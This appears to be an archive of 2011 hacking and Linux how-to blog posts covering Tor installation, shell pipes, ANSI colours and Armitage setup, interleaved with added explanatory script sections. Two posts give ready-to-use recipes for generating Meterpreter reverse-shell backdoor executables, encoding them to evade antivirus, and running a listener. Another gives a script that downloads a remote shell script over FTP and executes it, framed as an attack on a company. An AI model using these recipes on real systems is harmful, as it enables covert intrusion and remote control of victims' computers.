Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.
Bypassing Anti-Virus with msfencode.
Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.
Now let's take what we learned from the last post and pipe the msfpayload command to msfencode.
~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe
This will pipe the payload to msfencode to be passed through the encoder 5 times (-c specifies the number of times to pass it through the encoder); it will use the polymorphic xor encoder "shikata ga nai" and output the backdoor as "FuckMonsanto.exe".
You can fire up the handler in metasploit the same way as before, but I would like to add that you can run things as a "job" which will run in the background by using the "-j" option.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 19.84.20.11
msf exploit(handler) > set LPORT 3030
msf exploit(handler) > exploit -j
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the jobs command to see/interact with the jobs running in the background.
Sunday, May 29, 2011
Installing TOR manually - Debian / BT5
This will be a quick how-to on installing Tor manually in BT5. First, check which Debian release you're running;
cat /etc/debian_version
Now that you know what version of Debian you're running, open your sources.list and add the Tor repository, replacing <Distro> with that version;
nano /etc/apt/sources.list
deb http://deb.torproject.org/torproject.org <Distro> main
Save that with "ctrl-o" and then proceed to add the "GNU Privacy Guard" keys that are used to sign the Tor packages;
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now update your system and install the tor packages.
apt-get update
apt-get install tor tor-geoipdb
Now that Tor's installed, you can move on to installing polipo and the GUI Vidalia.
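Before piping the exported key into apt-key, it is worth checking that the key you received is the one you expected. As an added example (not from the original post), the functions below compare the full fingerprint reported by gpg against the value given above; the gpg output embedded in the script is a constructed sample, and import_tor_key assumes the same keyserver and key id as the post.

```shell
#!/bin/sh
# Added example (not from the original post): verify the full fingerprint
# of the key fetched with --recv before handing it to apt-key. The
# 8-character id given to --recv is only the last 32 bits of the
# fingerprint and is easy to collide, so compare all 40 hex digits.
# The expected value is the one from the post; the gpg output below is
# a constructed sample, not real gpg output.

EXPECTED_FPR='A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89'

SAMPLE_GPG='pub   2048R/886DDD89
      Key fingerprint = A3C4 F0F9 79CA A22C DBA8  F512 EE8C BC9E 886D DD89
uid                  Tor archive signing key (constructed sample)'

# Print every fingerprint in "gpg --fingerprint" output on stdin, one
# per line, upper-case, without the spacing gpg inserts.
extract_fingerprints() {
    grep -i 'fingerprint' | sed 's/.*= *//; s/ //g' | tr 'a-f' 'A-F'
}

# fingerprint_present EXPECTED: return 0 if EXPECTED (spaces and case
# ignored) is among the fingerprints on stdin, 1 otherwise. An empty
# EXPECTED never matches.
fingerprint_present() {
    want=$(printf '%s' "$1" | tr -d ' ' | tr 'a-f' 'A-F')
    [ -n "$want" ] && extract_fingerprints | grep -qx "$want"
}

# import_tor_key KEYID: the post's two gpg commands with the check in
# between; apt-key only sees the key if the fingerprint matches.
import_tor_key() {
    gpg --keyserver keys.gnupg.net --recv "$1" || return 1
    if gpg --fingerprint "$1" | fingerprint_present "$EXPECTED_FPR"; then
        gpg --export "$EXPECTED_FPR" | sudo apt-key add -
    else
        echo "fingerprint of $1 does not match, not adding it" >&2
        return 1
    fi
}
```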
SIPVicious Usage
Well I was going to go and make a quick SIPVicious demo, but there's this video which was a good demo on what these scripts are capable of doing. So instead of making another video, I'll just embed his as it's a good tutorial.
SIPVicious - SIP/VoIP Auditing Suite
SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools:
- svmap - this is a sip scanner. Lists SIP devices found on an IP range
- svwar - identifies active extensions on a PBX
- svcrack - an online password cracker for SIP PBX
- svreport - manages sessions and exports reports to various formats
- svcrash - attempts to stop unauthorized svwar and svcrack scans
Friday, May 20, 2011
Using pipelines to pipe data.
Well this is a simple concept, but its usefulness has no limits. It's the ability to pipe the output of one command into another. For example, I can use the "ip addr" command combined with grep to only display the lines containing the inet addresses.
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
inet 10.0.0.3/24 brd 192.168.1.255 scope global eth0
inet6 fe80::217:31ff:feda:9814/64 scope link
You could pipe that data along further to awk, then select specific data out of it to be displayed. For example;
~ $ ip addr | grep inet | awk '{print $2 ":" $4}'
127.0.0.1/8:host
::1/128:host
192.168.1.102/24:192.168.1.255
fe80::217:31ff:feda:9814/64:link
Another example involves that simple Java IP parser I made. While using it I noticed that a lot of scans had duplicate IPs, which could cause you to waste valuable time running tools against the same IP multiple times. I haven't been playing much with Java lately, so I decided to just fix the problem in a bash script with the "uniq" command. This is the command the script uses to remove duplicate IPs from the IP list.
java -jar ips.jar nlog | uniq > iplist.txt
You can find that Java parser here.
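As an added example (not code from the original post), here are the two pipelines above as functions over constructed input: one that pulls IPv4 addresses out of "ip addr" output, and one that shows why "uniq" on its own is not enough to de-duplicate a scan list.

```shell
#!/bin/sh
# Added example (not from the original post): the "ip addr" pipeline and
# the "uniq" de-duplication above, as functions with constructed input.

# Constructed sample of "ip addr" output (addresses as in the post).
SAMPLE_IP_ADDR='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 10.0.0.3/24 brd 10.0.0.255 scope global eth0
    inet6 fe80::217:31ff:feda:9814/64 scope link'

# Print "address/prefix:interface" for the IPv4 addresses on stdin.
# "grep inet" alone also matches the inet6 lines; anchoring on the word
# "inet" followed by a space keeps only IPv4. $NF is the interface name.
ipv4_addrs() {
    grep -E '^[[:space:]]*inet ' | awk '{print $2 ":" $NF}'
}

# Constructed, unsorted list of scanned hosts with repeats.
SAMPLE_IPS='10.0.0.3
10.0.0.7
10.0.0.3
10.0.0.5
10.0.0.7'

# "uniq" only collapses *adjacent* duplicates, so on the unsorted list
# above it removes nothing. Sorting by octet with -u gives one line per
# host, in address order.
dedupe_ips() {
    sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# Line count of stdin, without wc's leading padding.
count_lines() {
    wc -l | tr -d ' '
}
```

If the parser's output is already sorted, plain "uniq" is fine; otherwise "sort -u" (or "sort | uniq") is the safe choice.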
Tuesday, May 17, 2011
Using wget to download ftp files
This is a quick example of how you can use wget to download more than just HTML files; in this case we will download a shell script off our ftp server and then execute it.
#! /bin/sh
echo -e "\033[1;32;1mAttempting to destroy monsanto before they contaminate the planet with hazardous GMO's"
wget --ftp-user Pathogen --ftp-password hakhub ftp://ftp.drivehq.com:21/DestroyMonsanto.sh
chmod 755 DestroyMonsanto.sh
./DestroyMonsanto.sh
echo "Too late"
Monday, May 16, 2011
BT5 was released.
In case you guys haven't heard for some reason, BackTrack 5 has been released. I'm really enjoying it; it's probably my favorite one so far. The GUI is nice, and the tools are great as always. Download it from here;
http://www.backtrack-linux.org/downloads/
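Both the wget script above and the BackTrack ISO download come down to running something you fetched from the network. As an added example (not code from the original posts), the functions below fetch a file the same way but only mark it executable when its SHA-256 matches a digest obtained separately; the URL, credentials and digest in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): download the way the script
# above does, but only run the file if its SHA-256 matches a value you got
# separately (a release page that publishes checksums for an ISO, for
# instance, can be checked with the same function). URL and hash in the
# usage comment are placeholders.

# Print the SHA-256 hex digest of FILE with whichever tool is available.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 if FILE hashes to EXPECTED (hex, any case), 1 otherwise.
# An empty EXPECTED never matches, so a missing hash cannot pass.
verify_sha256() {
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -n "$expected" ] && [ "$(sha256_of "$1")" = "$expected" ]
}

# fetch_and_verify URL EXPECTED_SHA256 OUT: fetch with wget, check the
# digest, and make OUT executable only on a match. FTP credentials are
# read from FTP_USER / FTP_PASS instead of the command line, so they do
# not end up in shell history or "ps" output.
fetch_and_verify() {
    url="$1"; expected="$2"; out="$3"
    wget -q --ftp-user="${FTP_USER:-anonymous}" \
            --ftp-password="${FTP_PASS:-}" -O "$out" "$url" || return 1
    if verify_sha256 "$out" "$expected"; then
        chmod 755 "$out"
        return 0
    fi
    echo "checksum mismatch for $out, refusing to run it" >&2
    rm -f "$out"
    return 1
}

# Usage (placeholder values):
# FTP_USER=user FTP_PASS=secret \
#   fetch_and_verify ftp://example.invalid/script.sh <expected sha256> \
#       ./script.sh && ./script.sh
```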
Getting started with Armitage
Well I've never bothered playing with Armitage before, but I figured what the hell. I decided to post a quick how-to on getting it fired up for the first time. First, make sure you're all up to date, then use your repositories to install Armitage.
apt-get update
apt-get install armitage
Then we will have to fire up Metasploit's RPC daemon, as that's what Armitage uses to interact with the Metasploit framework.
msfrpcd -f -U msf -P test -t Basic
Now make sure mysql is up and running;
/etc/init.d/mysql start
Now, make sure you're in armitage's directory and run the shell script "armitage.sh". For BT4 (BT5 is out) you would be issuing these commands.
cd /pentest/exploits/armitage
armitage.sh
Now, seeing as we set the user as "msf" and the password as "pass" with the msfrpcd command, we can just hit "connect". That should have done it; if all's well you should see something like this;
Sunday, May 15, 2011
Creating an executable payload via msfpayload.
We'll be making a quick tutorial on how to create an executable using a metasploit payload. We will use a meterpreter payload, here's the command we would want to issue to create an ".exe".
msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=31337 X > /root/Shiny.exe
You can then verify it was created by using the "file" command, like so;
file /root/Shiny.exe
And it should say something along the lines of this;
/root/Shiny.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
You now have a working payload in the form of an exe, so you can fire up metasploit and use the exploit handler to listen for the incoming connections. Assuming we are in the metasploit console, we would issue the following commands;
msf> use exploit/multi/handler
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(Handler) > set LHOST 19.84.20.11
msf exploit(Handler) > set LPORT 31337
msf exploit(Handler) > exploit
You now have a handler waiting for incoming connections from those who run your meterpreter payload.
Saturday, May 14, 2011
Using colors in bash scripts with ANSI/VT100 codes.
Well, I've made a few posts related to bash scripting so I thought I'd make a quick post showing how you can add some color to your scripts. We will be using ANSI escape codes; here's a quick example of how to use them;
echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blue \033[0;34;1m"
nmap 127.0.0.1
Make sure you remember the "-e", which enables the interpretation of backslash escapes so it will actually accept the ANSI code rather than printing it out like a normal string.
Console Color chart
Black        0;30    Dark Gray     1;30
Blue         0;34    Light Blue    1;34
Green        0;32    Light Green   1;32
Cyan         0;36    Light Cyan    1;36
Red          0;31    Light Red     1;31
Purple       0;35    Light Purple  1;35
Brown        0;33    Yellow        1;33
Light Gray   0;37    White         1;37
Backgrounds
40 Black
41 Red
42 Green
43 Yellow
44 Blue
45 Magenta
46 Cyan
47 White
You can also add other attributes such as using underlined or bold/bright text by changing the last digit in the code, just before the "m". For example, to use the underline attribute I would do this;
echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blueish \033[0;34;4m"
echo -e "This is underlined\033[0m this is not"
Some Useful Attribute Codes
0m = Reset all attributes.
1m = Sets the "bright" attribute.
2m = Sets the "dim" attribute.
4m = Sets the "underline" attribute.
5m = Sets the "blink" attribute.
7m = Sets the "reverse" attribute.
8m = Sets the "hidden" attribute.
This is where I'll end this quick example of ANSI/VT100 codes being used to add color to your bash scripts. This is only a sample of the possibilities these codes create, so don't think it ends here. You can learn more at this site.
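As an added example (not code from the original post), the helpers below build the escape sequences from the chart above, always append the reset code so a colour does not bleed into the next command's output, and drop the codes entirely when output is not a terminal, which keeps log files readable; strip_ansi cleans up output that was captured with the codes in it.

```shell
#!/bin/sh
# Added example (not from the original post): small helpers around the
# ANSI codes above. A reset is always appended so the colour does not
# leak into the next command, and codes are skipped when stdout is not
# a terminal (e.g. when a script's output is redirected to a log file).

ESC=$(printf '\033')

# sgr ATTR FG [BG]: build "ESC[attr;fg[;bg]m" from the chart above,
# e.g. sgr 1 32 -> bright green, sgr 0 34 44 -> blue on blue background.
sgr() {
    if [ -n "${3:-}" ]; then
        printf '%s[%s;%s;%sm' "$ESC" "$1" "$2" "$3"
    else
        printf '%s[%s;%sm' "$ESC" "$1" "$2"
    fi
}

# colorize ATTR FG TEXT...: wrap TEXT in the sequence plus a reset
# (ESC[0m). COLOR=never forces plain text, COLOR=always forces codes;
# with anything else codes are emitted only when stdout is a terminal.
colorize() {
    attr="$1"; fg="$2"; shift 2
    case "${COLOR:-auto}" in
        never) printf '%s' "$*"; return ;;
        always) ;;
        *) [ -t 1 ] || { printf '%s' "$*"; return; } ;;
    esac
    printf '%s%s%s[0m' "$(sgr "$attr" "$fg")" "$*" "$ESC"
}

# strip_ansi: remove CSI sequences from stdin, handy when a coloured
# script's output has already been captured to a file.
strip_ansi() {
    sed "s/$ESC\[[0-9;]*[A-Za-z]//g"
}
```

Calling `colorize 1 32 "scan finished"; echo` on a terminal prints bright green text and leaves the prompt uncoloured; the same line redirected to a file writes plain text.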
Tuesday, May 10, 2011
Some useful shell commands/tools
Well I've been learning some useful things I previously didn't know about, so I thought I'd take a moment and post some useful things you can do at the command line.
See who's logged in and what they're doing with the "w" command;
~ $ w
00:41:06 up 1 day, 1:13, 8 users, load average: 1.57, 1.14, 1.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
pathogen pts/0 :0.0 Sun23 2:27m 57.59s 3:26 /usr/bin/python
pathogen pts/1 :0.0 Mon00 23:08m 0.29s 0.29s /bin/bash
pathogen pts/2 :0.0 Mon00 23:59m 35.86s 0.27s /bin/bash
pathogen pts/3 :0.0 Mon01 22:41m 4.50s 4.25s polipo
pathogen pts/4 :0.0 Mon02 1:42 44.25s 3:26 /usr/bin/python
pathogen pts/5 :0.0 23:32 0.00s 0.27s 0.01s w
pathogen pts/6 :0.0 23:34 57:46 0.48s 0.48s bash
pathogen pts/7 :0.0 23:44 56:24 0.28s 0.28s /bin/bash
The next command is the "tail" command which we used with arpwatch in a previous post. This command can be used to read the last 10 lines (or more) of a file or piped data and displays it in the terminal. This is nice if you want to watch logfiles for example.
tail -f /var/log/syslog
Another good command line tool is "top", which displays processor and process statistics in real time.
Next is an extremely handy command - man - which is short for manual and is used to display in-depth information about a given command, or gives you the ability to search for manuals containing a keyword. For example, the command "man ascii" returns a rather detailed ascii chart - which we all know can be a lifesaver. You can search for manuals containing a keyword like so;
~ $ man -k irc
aircrack-ng (1) - a 802.11 WEP / WPA-PSK key cracker
airodump-ng (1) - a wireless packet capture tool for aircrack-ng
airtun-ng (1) - a virtual tunnel interface creator for aircrack-ng
queue (3) - implementations of lists, tail queues, and circular queues
dir_colors (5) - configuration file for dircolors(1)
dircolors (1) - color setup for ls
irssi (1) - a modular IRC client for UNIX
xchat (1) - IRC client for X similar to AmIRC
XCirculateEvent (3) - CirculateNotify event structure
XCirculateRequestEvent (3) - CirculateRequest event structure
XCirculateSubwindows (3) - change window stacking order
XCirculateSubwindowsDown (3) - change window stacking order
XCirculateSubwindowsUp (3) - change window stacking order
This one is more a tip - autocompleting a command or directory using "TAB". If there's only one option then it autocompletes when you hit tab, otherwise it shows the possibilities. For example hitting "TAB" when I have net typed in the shell will return this;
~ $ net
net netcat netkit-ftp net.samba3 netscsid netstat
And hitting tab with /var/ typed will show me the existing directories in /var/, but if I hit "TAB" with "/var/r" then it will autocomplete it with "/var/run" because there's only one option.
This next command is "cat", which concatenates a file and displays it in the terminal. For example if we wanted to read the text file "hakhub" we could just use "cat";
~ $ cat hakhub
Is effin awesome.
You can also string commands together using the ";" operator, like we have with the ip parser and nmap. For example we can make a new directory and then copy our "hakhub" textfile to it. We will "cat" it at the end to verify it's there.
mkdir learning; cp hakhub /root/learning/;cat /root/learning/hakhub
Another useful command is "ln", which creates a link to a given file. For example we will make a symbolic link in the learning directory we created to the "hakhub" textfile in our root directory. Assuming we are currently in the root directory we will issue this command;
ln -s hakhub /root/learning/stuff
There's now a file in our learning directory which links back to our hakhub textfile, so if we were to cat the "stuff" link it would display its contents just as before. This could be useful to create links to tools located in various directories.
The next useful shell command is "screen", which I use to easily switch between various shells in one window (using CTRL-A);
“Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells).”
You can read more about screen and get an idea of what it is and how it can be used here - http://linux.die.net/man/1/screen
This next one is "df", which stands for disk free. Very basic but still nice to know if you have multiple drives or usb's up the yingyang.
~ $ df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda1 237431480 51512296 173858308 23% /
none 501520 316 501204 1% /dev
none 508544 284 508260 1% /dev/shm
none 508544 112 508432 1% /var/run
none 508544 0 508544 0% /var/lock
none 508544 0 508544 0% /lib/init/rw
none 237431480 51512296 173858308 23% /var/lib/ureadahead/debugfs
/dev/sdd1 1965696 637664 1328032 33% /media/SD Card
/dev/sdc1 1930464 1291072 639392 67% /media/disk-1
Next is "wget", which is a utility for non-interactive download of files from the internet. It supports both http and https along with ftp and has the ability to utilize proxies. This can be used in a variety of ways, it can be used with conky via bash scripts for example. Backtrack 4 uses a wget bash script to check the external ip and display it in conky. Though the possibilities are endless, that's just one example.
Another great tool that's simple yet has a ton of possible uses when coupled with other tools is grep. This tool is based around regular expressions and is used to search files for text. For example, this command would look for
This next tool is links2, a console-based text web browser which, as you can imagine, is extremely lightweight. There are others like it, such as lynx, but I prefer links2 myself. You can use it by typing links2 in your console, then pressing "g" and entering the url. You can use links2 with a proxy like so;
links2 -http-proxy 127.0.0.1:9050
or to run it with a graphical interface, you can add a "-g"
links2 -g -http-proxy 127.0.0.1:9050
To be continued......